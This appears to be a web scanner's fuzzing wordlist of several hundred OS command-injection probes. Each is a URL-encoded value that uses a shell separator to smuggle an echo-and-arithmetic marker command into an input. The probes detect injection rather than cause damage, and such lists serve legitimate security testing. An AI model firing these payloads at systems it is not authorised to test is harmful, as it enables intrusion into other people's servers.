+os-command-injection,'%26%26echo%20OCTJGM$((17%2B59))$(echo%20OCTJGM)OCTJGM\' +os-command-injection,'%7Cecho%20OXATGO$((9%2B84))$(echo%20OXATGO)OXATGO\' +os-command-injection,'%7C%7Cecho%20EUMDZA$((75%2B60))$(echo%20EUMDZA)EUMDZA\' +os-command-injection,'echo%20NTKKKZ$((98%2B48))$(echo%20NTKKKZ)NTKKKZ&' +os-command-injection,'%20echo%20ROWYVB$((27%2B55))$(echo%20ROWYVB)ROWYVB&' +os-command-injection,';echo%20BSAABA$((22%2B11))$(echo%20BSAABA)BSAABA&' +os-command-injection,'&echo%20XLLZAF$((16%2B93))$(echo%20XLLZAF)XLLZAF&' +os-command-injection,'|echo%20DTKVRT$((20%2B98))$(echo%20DTKVRT)DTKVRT&' +os-command-injection,'||echo%20RJENUY$((95%2B27))$(echo%20RJENUY)RJENUY&' +os-command-injection,'&&echo%20YLPPIG$((46%2B74))$(echo%20YLPPIG)YLPPIG&' +os-command-injection,'%0aecho%20RXYLFZ$((20%2B86))$(echo%20RXYLFZ)RXYLFZ&' +os-command-injection,'%3Becho%20OHFUJG$((48%2B14))$(echo%20OHFUJG)OHFUJG&' +os-command-injection,'%26echo%20CWOFVZ$((5%2B33))$(echo%20CWOFVZ)CWOFVZ&' +os-command-injection,'%26%26echo%20XVKSQG$((73%2B31))$(echo%20XVKSQG)XVKSQG&' +os-command-injection,'%7Cecho%20VSTJXX$((81%2B22))$(echo%20VSTJXX)VSTJXX&' +os-command-injection,'%7C%7Cecho%20VUVMFJ$((74%2B32))$(echo%20VUVMFJ)VUVMFJ&' +os-command-injection,'echo%20EJWKAI$((82%2B9))$(echo%20EJWKAI)EJWKAI|' +os-command-injection,'%20echo%20HVFWAN$((72%2B27))$(echo%20HVFWAN)HVFWAN|' +os-command-injection,';echo%20ZIRSUJ$((79%2B94))$(echo%20ZIRSUJ)ZIRSUJ|' +os-command-injection,'&echo%20RCNYOU$((2%2B11))$(echo%20RCNYOU)RCNYOU|' +os-command-injection,'|echo%20HHGNAV$((39%2B89))$(echo%20HHGNAV)HHGNAV|' +os-command-injection,'||echo%20DNDMGP$((12%2B45))$(echo%20DNDMGP)DNDMGP|' +os-command-injection,'&&echo%20HGBXKT$((12%2B65))$(echo%20HGBXKT)HGBXKT|' +os-command-injection,'%0aecho%20TFYSCR$((64%2B58))$(echo%20TFYSCR)TFYSCR|' +os-command-injection,'%3Becho%20LSPXCM$((79%2B79))$(echo%20LSPXCM)LSPXCM|' +os-command-injection,'%26echo%20TITLCP$((35%2B27))$(echo%20TITLCP)TITLCP|' +os-command-injection,'%26%26echo%20OUHWFL$((62%2B61))$(echo%20OUHWFL)OUHWFL|' +os-command-injection,'%7Cecho%20ACPWWS$((49%2B8))$(echo%20ACPWWS)ACPWWS|' +os-command-injection,'%7C%7Cecho%20MVZOUV$((29%2B33))$(echo%20MVZOUV)MVZOUV|' +os-command-injection,'echo%20SLHLJI$((31%2B31))$(echo%20SLHLJI)SLHLJI%27' +os-command-injection,'%20echo%20CBLVPB$((13%2B39))$(echo%20CBLVPB)CBLVPB%27' +os-command-injection,';echo%20DIKSWB$((93%2B23))$(echo%20DIKSWB)DIKSWB%27' +os-command-injection,'&echo%20EIEDPG$((1%2B95))$(echo%20EIEDPG)EIEDPG%27' +os-command-injection,'|echo%20SSHUWU$((85%2B62))$(echo%20SSHUWU)SSHUWU%27' +os-command-injection,'||echo%20HEYZBA$((8%2B23))$(echo%20HEYZBA)HEYZBA%27' +os-command-injection,'&&echo%20FEYLRM$((81%2B59))$(echo%20FEYLRM)FEYLRM%27' +os-command-injection,'%0aecho%20DINDDL$((2%2B20))$(echo%20DINDDL)DINDDL%27' +os-command-injection,'%3Becho%20CLWYAX$((98%2B78))$(echo%20CLWYAX)CLWYAX%27' +os-command-injection,'%26echo%20UMBLZI$((32%2B33))$(echo%20UMBLZI)UMBLZI%27' +os-command-injection,'%26%26echo%20HOPIIN$((13%2B15))$(echo%20HOPIIN)HOPIIN%27' +os-command-injection,'%7Cecho%20DSGRDB$((86%2B22))$(echo%20DSGRDB)DSGRDB%27' +os-command-injection,'%7C%7Cecho%20WQVXFQ$((11%2B54))$(echo%20WQVXFQ)WQVXFQ%27' +os-command-injection,'echo%20LTOENX$((42%2B36))$(echo%20LTOENX)LTOENX%22' +os-command-injection,'%20echo%20VKXTTD$((59%2B83))$(echo%20VKXTTD)VKXTTD%22' +os-command-injection,';echo%20IBYDJK$((27%2B85))$(echo%20IBYDJK)IBYDJK%22' +os-command-injection,'&echo%20VLOVLO$((85%2B23))$(echo%20VLOVLO)VLOVLO%22' +os-command-injection,'|echo%20YARTFJ$((41%2B57))$(echo%20YARTFJ)YARTFJ%22' +os-command-injection,'||echo%20EPBKKE$((59%2B69))$(echo%20EPBKKE)EPBKKE%22' +os-command-injection,'&&echo%20VEBSDL$((18%2B99))$(echo%20VEBSDL)VEBSDL%22' +os-command-injection,'%0aecho%20OPVAFF$((48%2B62))$(echo%20OPVAFF)OPVAFF%22' +os-command-injection,'%3Becho%20FMKLWP$((66%2B12))$(echo%20FMKLWP)FMKLWP%22' +os-command-injection,'%26echo%20YCWTLN$((43%2B74))$(echo%20YCWTLN)YCWTLN%22' +os-command-injection,'%26%26echo%20YKZSCO$((10%2B70))$(echo%20YKZSCO)YKZSCO%22' +os-command-injection,'%7Cecho%20KMHHPF$((93%2B77))$(echo%20KMHHPF)KMHHPF%22' +os-command-injection,'%7C%7Cecho%20SRPIFR$((51%2B42))$(echo%20SRPIFR)SRPIFR%22' +os-command-injection,'echo%20PXZDJA$((86%2B79))$(echo%20PXZDJA)PXZDJA%5C%5C' +os-command-injection,'%20echo%20THCQQN$((0%2B88))$(echo%20THCQQN)THCQQN%5C%5C' +os-command-injection,';echo%20OSGFBJ$((4%2B40))$(echo%20OSGFBJ)OSGFBJ%5C%5C' +os-command-injection,'&echo%20OSUMBG$((2%2B75))$(echo%20OSUMBG)OSUMBG%5C%5C' +os-command-injection,'|echo%20QVGNVW$((11%2B26))$(echo%20QVGNVW)QVGNVW%5C%5C' +os-command-injection,'||echo%20PNTMBC$((8%2B17))$(echo%20PNTMBC)PNTMBC%5C%5C' +os-command-injection,'&&echo%20SGBEKO$((44%2B10))$(echo%20SGBEKO)SGBEKO%5C%5C' +os-command-injection,'%0aecho%20FUZHOM$((22%2B69))$(echo%20FUZHOM)FUZHOM%5C%5C' +os-command-injection,'%3Becho%20FXYIAP$((22%2B40))$(echo%20FXYIAP)FXYIAP%5C%5C' +os-command-injection,'%26echo%20FEBSKN$((28%2B4))$(echo%20FEBSKN)FEBSKN%5C%5C' +os-command-injection,'%26%26echo%20YAIFIN$((82%2B83))$(echo%20YAIFIN)YAIFIN%5C%5C' +os-command-injection,'%7Cecho%20HSVDWC$((31%2B24))$(echo%20HSVDWC)HSVDWC%5C%5C' +os-command-injection,'%7C%7Cecho%20HXJEXE$((93%2B89))$(echo%20HXJEXE)HXJEXE%5C%5C' +os-command-injection,'echo%20CDGATY$((12%2B29))$(echo%20CDGATY)CDGATY%2F%2F' +os-command-injection,'%20echo%20XHVOFZ$((83%2B80))$(echo%20XHVOFZ)XHVOFZ%2F%2F' +os-command-injection,';echo%20XSFSQB$((48%2B74))$(echo%20XSFSQB)XSFSQB%2F%2F' +os-command-injection,'&echo%20CXWXBB$((97%2B33))$(echo%20CXWXBB)CXWXBB%2F%2F' +os-command-injection,'|echo%20YSISTZ$((83%2B82))$(echo%20YSISTZ)YSISTZ%2F%2F' +os-command-injection,'||echo%20OSDDFQ$((3%2B39))$(echo%20OSDDFQ)OSDDFQ%2F%2F' +os-command-injection,'&&echo%20RPUZNC$((77%2B38))$(echo%20RPUZNC)RPUZNC%2F%2F' +os-command-injection,'%0aecho%20THLXXR$((89%2B18))$(echo%20THLXXR)THLXXR%2F%2F' +os-command-injection,'%3Becho%20DXYJDU$((98%2B7))$(echo%20DXYJDU)DXYJDU%2F%2F' +os-command-injection,'%26echo%20XOVEHW$((64%2B7))$(echo%20XOVEHW)XOVEHW%2F%2F' +os-command-injection,'%26%26echo%20NSDCQT$((87%2B20))$(echo%20NSDCQT)NSDCQT%2F%2F' +os-command-injection,'%7Cecho%20LZYGCY$((26%2B70))$(echo%20LZYGCY)LZYGCY%2F%2F' +os-command-injection,'%7C%7Cecho%20OUUQGP$((77%2B65))$(echo%20OUUQGP)OUUQGP%2F%2F' +os-command-injection,'echo%20BKRXCQ$((95%2B40))$(echo%20BKRXCQ)BKRXCQ%26' +os-command-injection,'%20echo%20QKJRMZ$((93%2B3))$(echo%20QKJRMZ)QKJRMZ%26' +os-command-injection,';echo%20ZQUXYY$((11%2B19))$(echo%20ZQUXYY)ZQUXYY%26' +os-command-injection,'&echo%20HATTRN$((28%2B69))$(echo%20HATTRN)HATTRN%26' +os-command-injection,'|echo%20ISAUQR$((2%2B13))$(echo%20ISAUQR)ISAUQR%26' +os-command-injection,'||echo%20UOPEHO$((55%2B30))$(echo%20UOPEHO)UOPEHO%26' +os-command-injection,'&&echo%20VGPHAP$((62%2B79))$(echo%20VGPHAP)VGPHAP%26' +os-command-injection,'%0aecho%20KWAWXC$((47%2B31))$(echo%20KWAWXC)KWAWXC%26' +os-command-injection,'%3Becho%20DNATLQ$((29%2B55))$(echo%20DNATLQ)DNATLQ%26' +os-command-injection,'%26echo%20GICKYF$((34%2B87))$(echo%20GICKYF)GICKYF%26' +os-command-injection,'%26%26echo%20ZEPMBC$((82%2B3))$(echo%20ZEPMBC)ZEPMBC%26' +os-command-injection,'%7Cecho%20QDGJFF$((4%2B21))$(echo%20QDGJFF)QDGJFF%26' +os-command-injection,'%7C%7Cecho%20QCTOMN$((80%2B24))$(echo%20QCTOMN)QCTOMN%26' +os-command-injection,'echo%20GXOGIA$((9%2B37))$(echo%20GXOGIA)GXOGIA%7C' +os-command-injection,'%20echo%20OQZVWP$((28%2B27))$(echo%20OQZVWP)OQZVWP%7C' +os-command-injection,';echo%20TFWHBO$((48%2B78))$(echo%20TFWHBO)TFWHBO%7C' +os-command-injection,'&echo%20TEOUXN$((44%2B11))$(echo%20TEOUXN)TEOUXN%7C' +os-command-injection,'|echo%20SVSMOA$((21%2B73))$(echo%20SVSMOA)SVSMOA%7C' +os-command-injection,'||echo%20TVGLAW$((25%2B16))$(echo%20TVGLAW)TVGLAW%7C' +os-command-injection,'&&echo%20YJBIEJ$((20%2B48))$(echo%20YJBIEJ)YJBIEJ%7C' +os-command-injection,'%0aecho%20VXXNDX$((4%2B53))$(echo%20VXXNDX)VXXNDX%7C' +os-command-injection,'%3Becho%20OVSKJI$((16%2B53))$(echo%20OVSKJI)OVSKJI%7C' +os-command-injection,'%26echo%20QWOBER$((53%2B15))$(echo%20QWOBER)QWOBER%7C' +os-command-injection,'%26%26echo%20MVFPXA$((61%2B74))$(echo%20MVFPXA)MVFPXA%7C' +os-command-injection,'%7Cecho%20JQVRWN$((97%2B95))$(echo%20JQVRWN)JQVRWN%7C' +os-command-injection,'%7C%7Cecho%20FGCEYJ$((57%2B45))$(echo%20FGCEYJ)FGCEYJ%7C' +os-command-injection,'%26echo%20LQDBIP$((97%2B15))$(echo%20LQDBIP)LQDBIP' +os-command-injection,'%26%20echo%20QJINVP$((61%2B57))$(echo%20QJINVP)QJINVP' +os-command-injection,';echo%20OXGNMX$((41%2B15))$(echo%20OXGNMX)OXGNMX' +os-command-injection,'&echo%20JDWSVZ$((58%2B52))$(echo%20JDWSVZ)JDWSVZ' +os-command-injection,'|echo%20PVFIQF$((0%2B23))$(echo%20PVFIQF)PVFIQF' +os-command-injection,'||echo%20KBFRKR$((35%2B98))$(echo%20KBFRKR)KBFRKR' +os-command-injection,'&&echo%20WFUVSV$((8%2B81))$(echo%20WFUVSV)WFUVSV' +os-command-injection,'%0aecho%20KYCGWH$((95%2B3))$(echo%20KYCGWH)KYCGWH' +os-command-injection,'%3Becho%20OOBLUU$((57%2B95))$(echo%20OOBLUU)OOBLUU' +os-command-injection,'%26echo%20AAKQAO$((78%2B60))$(echo%20AAKQAO)AAKQAO' +os-command-injection,'%26%26echo%20KSNQJR$((81%2B61))$(echo%20KSNQJR)KSNQJR' +os-command-injection,'%7Cecho%20TDQPPJ$((73%2B90))$(echo%20TDQPPJ)TDQPPJ' +os-command-injection,'%7C%7Cecho%20CHJQTG$((39%2B34))$(echo%20CHJQTG)CHJQTG' +os-command-injection,'echo%20NXONQU$((86%2B15))$(echo%20NXONQU)NXONQU'' +os-command-injection,'%20echo%20MGXQDS$((94%2B23))$(echo%20MGXQDS)MGXQDS'' +os-command-injection,';echo%20STJJEN$((67%2B8))$(echo%20STJJEN)STJJEN'' +os-command-injection,'&echo%20RCBRLG$((15%2B16))$(echo%20RCBRLG)RCBRLG'' +os-command-injection,'|echo%20JQKYOJ$((43%2B35))$(echo%20JQKYOJ)JQKYOJ'' +os-command-injection,'||echo%20VYZGPJ$((27%2B25))$(echo%20VYZGPJ)VYZGPJ'' +os-command-injection,'&&echo%20QVCFLS$((84%2B30))$(echo%20QVCFLS)QVCFLS'' +os-command-injection,'%0aecho%20TXQFBT$((39%2B43))$(echo%20TXQFBT)TXQFBT'' +os-command-injection,'%3Becho%20YGSTDU$((3%2B28))$(echo%20YGSTDU)YGSTDU'' +os-command-injection,'%26echo%20QFACMV$((19%2B23))$(echo%20QFACMV)QFACMV'' +os-command-injection,'%26%26echo%20TWFPKP$((59%2B90))$(echo%20TWFPKP)TWFPKP'' +os-command-injection,'%7Cecho%20EBRXMB$((11%2B49))$(echo%20EBRXMB)EBRXMB'' +os-command-injection,'%7C%7Cecho%20VIYVBR$((79%2B51))$(echo%20VIYVBR)VIYVBR'' +os-command-injection,'echo%20BRRGHV$((59%2B39))$(echo%20BRRGHV)BRRGHV"' +os-command-injection,'%20echo%20DRLNDB$((45%2B12))$(echo%20DRLNDB)DRLNDB"' +os-command-injection,';echo%20BOSXTS$((61%2B2))$(echo%20BOSXTS)BOSXTS"' +os-command-injection,'&echo%20TIIEEY$((36%2B32))$(echo%20TIIEEY)TIIEEY"' +os-command-injection,'|echo%20QQBCQL$((54%2B23))$(echo%20QQBCQL)QQBCQL"' +os-command-injection,'||echo%20EGVZBX$((88%2B98))$(echo%20EGVZBX)EGVZBX"' +os-command-injection,'&&echo%20KPFBCT$((17%2B12))$(echo%20KPFBCT)KPFBCT"' +os-command-injection,'%0aecho%20BLZAZS$((67%2B95))$(echo%20BLZAZS)BLZAZS"' +os-command-injection,'%3Becho%20CWGSJV$((66%2B67))$(echo%20CWGSJV)CWGSJV"' +os-command-injection,'%26echo%20EGLUMP$((59%2B73))$(echo%20EGLUMP)EGLUMP"' +os-command-injection,'%26%26echo%20NDMYPS$((48%2B41))$(echo%20NDMYPS)NDMYPS"' +os-command-injection,'%7Cecho%20VHYHSQ$((46%2B81))$(echo%20VHYHSQ)VHYHSQ"' +os-command-injection,'%7C%7Cecho%20GLTVHA$((47%2B68))$(echo%20GLTVHA)GLTVHA"' +os-command-injection,'echo%20OUEOUN$((36%2B63))$(echo%20OUEOUN)OUEOUN' +os-command-injection,'%20echo%20YPGHYO$((29%2B85))$(echo%20YPGHYO)YPGHYO' +os-command-injection,';echo%20UKKXOY$((15%2B70))$(echo%20UKKXOY)UKKXOY' +os-command-injection,'&echo%20TDKYEQ$((93%2B40))$(echo%20TDKYEQ)TDKYEQ' +os-command-injection,'|echo%20DHCFMD$((19%2B7))$(echo%20DHCFMD)DHCFMD' +os-command-injection,'||echo%20QLNCNS$((54%2B0))$(echo%20QLNCNS)QLNCNS' +os-command-injection,'&&echo%20HJTQXE$((5%2B51))$(echo%20HJTQXE)HJTQXE' +os-command-injection,'%0aecho%20UFXVBT$((19%2B18))$(echo%20UFXVBT)UFXVBT' +os-command-injection,'%3Becho%20SKJOIJ$((68%2B83))$(echo%20SKJOIJ)SKJOIJ' +os-command-injection,'%26echo%20PSQPBU$((10%2B52))$(echo%20PSQPBU)PSQPBU' +os-command-injection,'%26%26echo%20YQCCXV$((3%2B76))$(echo%20YQCCXV)YQCCXV' +os-command-injection,'%7Cecho%20UQHUGC$((5%2B71))$(echo%20UQHUGC)UQHUGC' +os-command-injection,'%7C%7Cecho%20FKMVVE$((10%2B58))$(echo%20FKMVVE)FKMVVE' +os-command-injection,'echo%20RSCBOB$((85%2B25))$(echo%20RSCBOB)RSCBOB//' +os-command-injection,'%20echo%20PJVHQL$((20%2B65))$(echo%20PJVHQL)PJVHQL//' +os-command-injection,';echo%20FTUKUF$((89%2B93))$(echo%20FTUKUF)FTUKUF//' +os-command-injection,'&echo%20XYNJUX$((85%2B41))$(echo%20XYNJUX)XYNJUX//' +os-command-injection,'|echo%20HODOEM$((87%2B81))$(echo%20HODOEM)HODOEM//' +os-command-injection,'||echo%20AYKDNR$((62%2B16))$(echo%20AYKDNR)AYKDNR//' +os-command-injection,'&&echo%20BDNTCM$((25%2B80))$(echo%20BDNTCM)BDNTCM//' +os-command-injection,'%0aecho%20GOYPAH$((75%2B21))$(echo%20GOYPAH)GOYPAH//' +os-command-injection,'%3Becho%20MHISGE$((85%2B13))$(echo%20MHISGE)MHISGE//' +os-command-injection,'%26echo%20JCPTZR$((19%2B12))$(echo%20JCPTZR)JCPTZR//' +os-command-injection,'%26%26echo%20ZHQBQS$((72%2B22))$(echo%20ZHQBQS)ZHQBQS//' +os-command-injection,'%7Cecho%20DRBQLH$((57%2B13))$(echo%20DRBQLH)DRBQLH//' +os-command-injection,'%7C%7Cecho%20GGJYSE$((67%2B63))$(echo%20GGJYSE)GGJYSE//' +os-command-injection,'echo%20HVYPWJ$((15%2B1))$(echo%20HVYPWJ)HVYPWJ\' +os-command-injection,'%20echo%20NCMPJP$((69%2B98))$(echo%20NCMPJP)NCMPJP\' +os-command-injection,';echo%20EKHLZG$((64%2B29))$(echo%20EKHLZG)EKHLZG\' +os-command-injection,'&echo%20JYGQCN$((44%2B48))$(echo%20JYGQCN)JYGQCN\' +os-command-injection,'|echo%20SUVOTB$((44%2B30))$(echo%20SUVOTB)SUVOTB\' +os-command-injection,'||echo%20KPNBST$((18%2B29))$(echo%20KPNBST)KPNBST\' +os-command-injection,'&&echo%20RBCZEH$((34%2B18))$(echo%20RBCZEH)RBCZEH\' +os-command-injection,'%0aecho%20SJTIHB$((1%2B37))$(echo%20SJTIHB)SJTIHB\' +os-command-injection,'%3Becho%20RXPYLT$((92%2B26))$(echo%20RXPYLT)RXPYLT\' +os-command-injection,'%26echo%20UQBVZS$((49%2B88))$(echo%20UQBVZS)UQBVZS\' +os-command-injection,'%26%26echo%20SJDKJV$((54%2B71))$(echo%20SJDKJV)SJDKJV\' +os-command-injection,'%7Cecho%20PHLZMC$((98%2B93))$(echo%20PHLZMC)PHLZMC\' +os-command-injection,'%7C%7Cecho%20OXPIUV$((55%2B69))$(echo%20OXPIUV)OXPIUV\' +os-command-injection,'echo%20LBGSCB$((75%2B53))$(echo%20LBGSCB)LBGSCB&' +os-command-injection,'%20echo%20VAAVBM$((40%2B49))$(echo%20VAAVBM)VAAVBM&' +os-command-injection,';echo%20UWAPJX$((78%2B84))$(echo%20UWAPJX)UWAPJX&' +os-command-injection,'&echo%20QSELIT$((42%2B46))$(echo%20QSELIT)QSELIT&' +os-command-injection,'|echo%20GBNBXF$((98%2B4))$(echo%20GBNBXF)GBNBXF&' +os-command-injection,'||echo%20KKWMUH$((89%2B92))$(echo%20KKWMUH)KKWMUH&' +os-command-injection,'&&echo%20CNCBLT$((66%2B98))$(echo%20CNCBLT)CNCBLT&' +os-command-injection,'%0aecho%20WOLMWS$((65%2B25))$(echo%20WOLMWS)WOLMWS&' +os-command-injection,'%3Becho%20ZUILRB$((40%2B52))$(echo%20ZUILRB)ZUILRB&' +os-command-injection,'%26echo%20TBCUEY$((8%2B42))$(echo%20TBCUEY)TBCUEY&' +os-command-injection,'%26%26echo%20BMKZQV$((89%2B7))$(echo%20BMKZQV)BMKZQV&' +os-command-injection,'%7Cecho%20RWGJZW$((36%2B73))$(echo%20RWGJZW)RWGJZW&' +os-command-injection,'%7C%7Cecho%20KXJBTF$((63%2B25))$(echo%20KXJBTF)KXJBTF&' +os-command-injection,'echo%20NRIFAB$((13%2B88))$(echo%20NRIFAB)NRIFAB|' +os-command-injection,'%20echo%20IOJYKG$((10%2B79))$(echo%20IOJYKG)IOJYKG|' +os-command-injection,';echo%20KOAUAW$((33%2B36))$(echo%20KOAUAW)KOAUAW|' +os-command-injection,'&echo%20WRYKIU$((34%2B68))$(echo%20WRYKIU)WRYKIU|' +os-command-injection,'|echo%20KDOBDY$((28%2B82))$(echo%20KDOBDY)KDOBDY|' +os-command-injection,'||echo%20LZGCEO$((29%2B11))$(echo%20LZGCEO)LZGCEO|' +os-command-injection,'&&echo%20EOLZZI$((76%2B39))$(echo%20EOLZZI)EOLZZI|' +os-command-injection,'%0aecho%20QLRSUP$((61%2B80))$(echo%20QLRSUP)QLRSUP|' +os-command-injection,'%3Becho%20YGFETC$((86%2B48))$(echo%20YGFETC)YGFETC|' +os-command-injection,'%26echo%20VLCTNG$((82%2B89))$(echo%20VLCTNG)VLCTNG|' +os-command-injection,'%26%26echo%20TETKKY$((84%2B73))$(echo%20TETKKY)TETKKY|' +os-command-injection,'%7Cecho%20RQGHQR$((90%2B57))$(echo%20RQGHQR)RQGHQR|' +os-command-injection,'%7C%7Cecho%20CYXVMU$((24%2B36))$(echo%20CYXVMU)CYXVMU|' +os-command-injection,'echo%20QFCALQ$((19%2B0))$(echo%20QFCALQ)QFCALQ%27' +os-command-injection,'%20echo%20VMEFKZ$((26%2B36))$(echo%20VMEFKZ)VMEFKZ%27' +os-command-injection,';echo%20JBPPQK$((55%2B35))$(echo%20JBPPQK)JBPPQK%27' +os-command-injection,'&echo%20AUJZVK$((4%2B31))$(echo%20AUJZVK)AUJZVK%27' +os-command-injection,'|echo%20OBEPVB$((99%2B41))$(echo%20OBEPVB)OBEPVB%27' +os-command-injection,'||echo%20FCIAEL$((12%2B72))$(echo%20FCIAEL)FCIAEL%27' +os-command-injection,'&&echo%20HECZHW$((41%2B77))$(echo%20HECZHW)HECZHW%27' +os-command-injection,'%0aecho%20QUYIRT$((99%2B30))$(echo%20QUYIRT)QUYIRT%27' +os-command-injection,'%3Becho%20OKHPYH$((66%2B11))$(echo%20OKHPYH)OKHPYH%27' +os-command-injection,'%26echo%20SGEJFS$((3%2B63))$(echo%20SGEJFS)SGEJFS%27' +os-command-injection,'%26%26echo%20SLSODI$((22%2B77))$(echo%20SLSODI)SLSODI%27' +os-command-injection,'%7Cecho%20JZRWVD$((83%2B63))$(echo%20JZRWVD)JZRWVD%27' +os-command-injection,'%7C%7Cecho%20CKNPSQ$((65%2B36))$(echo%20CKNPSQ)CKNPSQ%27' +os-command-injection,'echo%20IXGIJZ$((51%2B13))$(echo%20IXGIJZ)IXGIJZ%22' +os-command-injection,'%20echo%20DWODRY$((85%2B90))$(echo%20DWODRY)DWODRY%22' +os-command-injection,';echo%20YUCTUM$((64%2B59))$(echo%20YUCTUM)YUCTUM%22' +os-command-injection,'&echo%20GZHQMB$((76%2B23))$(echo%20GZHQMB)GZHQMB%22' +os-command-injection,'|echo%20MAVZWG$((0%2B81))$(echo%20MAVZWG)MAVZWG%22' +os-command-injection,'||echo%20YJAQPI$((25%2B18))$(echo%20YJAQPI)YJAQPI%22' +os-command-injection,'&&echo%20EVVYXO$((98%2B26))$(echo%20EVVYXO)EVVYXO%22' +os-command-injection,'%0aecho%20YKMXVM$((97%2B0))$(echo%20YKMXVM)YKMXVM%22' +os-command-injection,'%3Becho%20JSDBIM$((99%2B35))$(echo%20JSDBIM)JSDBIM%22' +os-command-injection,'%26echo%20TIRPSP$((59%2B67))$(echo%20TIRPSP)TIRPSP%22' +os-command-injection,'%26%26echo%20PZSPFJ$((63%2B85))$(echo%20PZSPFJ)PZSPFJ%22' +os-command-injection,'%7Cecho%20IWVQXP$((56%2B14))$(echo%20IWVQXP)IWVQXP%22' +os-command-injection,'%7C%7Cecho%20SEOPIT$((30%2B65))$(echo%20SEOPIT)SEOPIT%22' +os-command-injection,'echo%20NXXMYC$((83%2B4))$(echo%20NXXMYC)NXXMYC%5C%5C' +os-command-injection,'%20echo%20UWIANE$((47%2B69))$(echo%20UWIANE)UWIANE%5C%5C' +os-command-injection,';echo%20VPNQXQ$((3%2B65))$(echo%20VPNQXQ)VPNQXQ%5C%5C' +os-command-injection,'&echo%20UPPHYJ$((1%2B62))$(echo%20UPPHYJ)UPPHYJ%5C%5C' +os-command-injection,'|echo%20KCPSNB$((82%2B19))$(echo%20KCPSNB)KCPSNB%5C%5C' +os-command-injection,'||echo%20BDZWWB$((16%2B92))$(echo%20BDZWWB)BDZWWB%5C%5C' +os-command-injection,'&&echo%20CYENPU$((54%2B11))$(echo%20CYENPU)CYENPU%5C%5C' +os-command-injection,'%0aecho%20LKGEJU$((76%2B63))$(echo%20LKGEJU)LKGEJU%5C%5C' +os-command-injection,'%3Becho%20SBGUSE$((30%2B27))$(echo%20SBGUSE)SBGUSE%5C%5C' +os-command-injection,'%26echo%20CRIQOG$((34%2B52))$(echo%20CRIQOG)CRIQOG%5C%5C' +os-command-injection,'%26%26echo%20BAHZUB$((39%2B52))$(echo%20BAHZUB)BAHZUB%5C%5C' +os-command-injection,'%7Cecho%20DONSLV$((7%2B31))$(echo%20DONSLV)DONSLV%5C%5C' +os-command-injection,'%7C%7Cecho%20XLRSQY$((12%2B78))$(echo%20XLRSQY)XLRSQY%5C%5C' +os-command-injection,'echo%20KOGUZU$((35%2B4))$(echo%20KOGUZU)KOGUZU%2F%2F' +os-command-injection,'%20echo%20ZUHEPR$((0%2B30))$(echo%20ZUHEPR)ZUHEPR%2F%2F' +os-command-injection,';echo%20FGXIGR$((59%2B62))$(echo%20FGXIGR)FGXIGR%2F%2F' +os-command-injection,'&echo%20BVLJXS$((57%2B50))$(echo%20BVLJXS)BVLJXS%2F%2F' +os-command-injection,'|echo%20YJGAOX$((31%2B49))$(echo%20YJGAOX)YJGAOX%2F%2F' +os-command-injection,'||echo%20YLLPSR$((30%2B99))$(echo%20YLLPSR)YLLPSR%2F%2F' +os-command-injection,'&&echo%20LZKRLE$((89%2B61))$(echo%20LZKRLE)LZKRLE%2F%2F' +os-command-injection,'%0aecho%20LBEVAD$((90%2B55))$(echo%20LBEVAD)LBEVAD%2F%2F' +os-command-injection,'%3Becho%20AXSYWN$((98%2B71))$(echo%20AXSYWN)AXSYWN%2F%2F' +os-command-injection,'%26echo%20JVRRJE$((66%2B84))$(echo%20JVRRJE)JVRRJE%2F%2F' +os-command-injection,'%26%26echo%20QOVHPK$((74%2B92))$(echo%20QOVHPK)QOVHPK%2F%2F' +os-command-injection,'%7Cecho%20JQHGOG$((52%2B28))$(echo%20JQHGOG)JQHGOG%2F%2F' +os-command-injection,'%7C%7Cecho%20ERPAKK$((2%2B34))$(echo%20ERPAKK)ERPAKK%2F%2F' +os-command-injection,'echo%20EPELRS$((18%2B25))$(echo%20EPELRS)EPELRS%26' +os-command-injection,'%20echo%20GAZVPT$((45%2B89))$(echo%20GAZVPT)GAZVPT%26' +os-command-injection,';echo%20SXXKOK$((57%2B8))$(echo%20SXXKOK)SXXKOK%26' +os-command-injection,'&echo%20DPZXBY$((14%2B0))$(echo%20DPZXBY)DPZXBY%26' +os-command-injection,'|echo%20LAPJLQ$((95%2B69))$(echo%20LAPJLQ)LAPJLQ%26' +os-command-injection,'||echo%20RZQOUE$((1%2B0))$(echo%20RZQOUE)RZQOUE%26' +os-command-injection,'&&echo%20DBWTGZ$((49%2B92))$(echo%20DBWTGZ)DBWTGZ%26' +os-command-injection,'%0aecho%20EMMLEG$((69%2B45))$(echo%20EMMLEG)EMMLEG%26' +os-command-injection,'%3Becho%20WQAPQR$((68%2B99))$(echo%20WQAPQR)WQAPQR%26' +os-command-injection,'%26echo%20KNTCFP$((68%2B73))$(echo%20KNTCFP)KNTCFP%26' +os-command-injection,'%26%26echo%20JCHUJJ$((46%2B0))$(echo%20JCHUJJ)JCHUJJ%26' +os-command-injection,'%7Cecho%20YHQVRJ$((39%2B41))$(echo%20YHQVRJ)YHQVRJ%26' +os-command-injection,'%7C%7Cecho%20WBGPIV$((75%2B82))$(echo%20WBGPIV)WBGPIV%26' +os-command-injection,'echo%20URWAUA$((68%2B21))$(echo%20URWAUA)URWAUA%7C' +os-command-injection,'%20echo%20QCALON$((95%2B41))$(echo%20QCALON)QCALON%7C' +os-command-injection,';echo%20XJGFPU$((17%2B93))$(echo%20XJGFPU)XJGFPU%7C' +os-command-injection,'&echo%20JNSOXA$((61%2B86))$(echo%20JNSOXA)JNSOXA%7C' +os-command-injection,'|echo%20IVIYPT$((61%2B1))$(echo%20IVIYPT)IVIYPT%7C' +os-command-injection,'||echo%20KTAZQG$((85%2B41))$(echo%20KTAZQG)KTAZQG%7C' +os-command-injection,'&&echo%20XTYKFU$((13%2B92))$(echo%20XTYKFU)XTYKFU%7C' +os-command-injection,'%0aecho%20BPDPMT$((28%2B28))$(echo%20BPDPMT)BPDPMT%7C' +os-command-injection,'%3Becho%20XJTEZA$((75%2B98))$(echo%20XJTEZA)XJTEZA%7C' +os-command-injection,'%26echo%20FOXDLA$((60%2B49))$(echo%20FOXDLA)FOXDLA%7C' +os-command-injection,'%26%26echo%20ONGWOM$((79%2B3))$(echo%20ONGWOM)ONGWOM%7C' +os-command-injection,'%7Cecho%20VZDOKD$((12%2B24))$(echo%20VZDOKD)VZDOKD%7C' +os-command-injection,'%7C%7Cecho%20XSXWGV$((71%2B98))$(echo%20XSXWGV)XSXWGV%7C' +os-command-injection,'echo$IFSYOOFMV$((62%2B55))$(echo$IFSYOOFMV)YOOFMV' 